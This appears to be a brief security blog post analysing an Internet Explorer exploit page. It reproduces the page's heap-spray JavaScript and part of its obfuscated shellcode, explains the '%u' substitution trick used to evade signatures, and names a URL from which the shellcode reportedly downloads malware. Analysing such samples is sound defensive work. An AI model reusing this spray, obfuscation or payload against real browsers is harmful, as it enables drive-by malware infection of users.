vip.4s3w.cn/vip/I7.htm

another IE exploit, but this evasion technique is so cute, take a look:

[snip]
// Spray routine from the analysed page: it fills a large array with copies of
// filler + payload, which is the shape of a classic heap spray.
// `sc` is the payload as a string in which the "%u" of the usual "%uXXXX"
// encoding has been swapped for the token "cuteqqcn"; the first line puts
// "%u" back ("\x25\x75" is "%u") and unescape() decodes it to a UTF-16 string.
// Detection note: a signature keyed on the literal "%u" misses this sample;
// match the replace()-then-unescape() pattern or the substitute token instead.
function spray(sc)
{
var infect=unescape(sc.replace(/cuteqqcn/g,"\x25\x75"));
// Size of each sprayed block, and the decoded payload's size counted as two
// bytes per UTF-16 code unit.
var CuteSize=0x100000;
var cuteLoadSize=infect.length*2;
var szlong=CuteSize-(cuteLoadSize+0x038);
// Filler pattern; getSampleValue() (defined below) repeats it to szlong bytes.
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
// aaablk, zzchuck and i are assigned without var, so in sloppy mode they
// become globals on window.
aaablk=(0x0a0a0a0a-0x100000)/CuteSize;
zzchuck=new window['Array']();
for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}

// Grows `retVal` by repeated self-concatenation until its length, counted as
// two bytes per UTF-16 code unit, reaches `szlong`, then trims the result to
// szlong/2 code units. spray() uses it to build the filler half of each block.
// An empty `retVal` with a positive `szlong` never terminates (same as before).
function getSampleValue(retVal,szlong)
{
var grown = retVal;
for (;;) {
  if (grown.length * 2 >= szlong) { break; }
  grown = grown + grown;
}
return grown.substring(0, szlong / 2);
}
// The token that stands in for "%u" inside the obfuscated string handed to spray().
var a1="cuteqqcn";
spray("cuteqqcn9090cuteqqcn9090cuteqqcn9090"+a1+"6090cuteqqcn17ebcuteqqcn645ecuteqqcn30a1cuteqqcn0000cuteqqcn0500cuteqqcn0800cuteqqcn0000cuteqqcnf88bcuteqqcn00b9cuteqqcn0004cuteqqcnf300
[snip]

Well… maybe not; it is just trying to evade detection by replacing %u with “cuteqqcn”.

Anyway, the shellcode will download malware from
www-onlinedown.com/ie7/DUMete.exe (VT result)
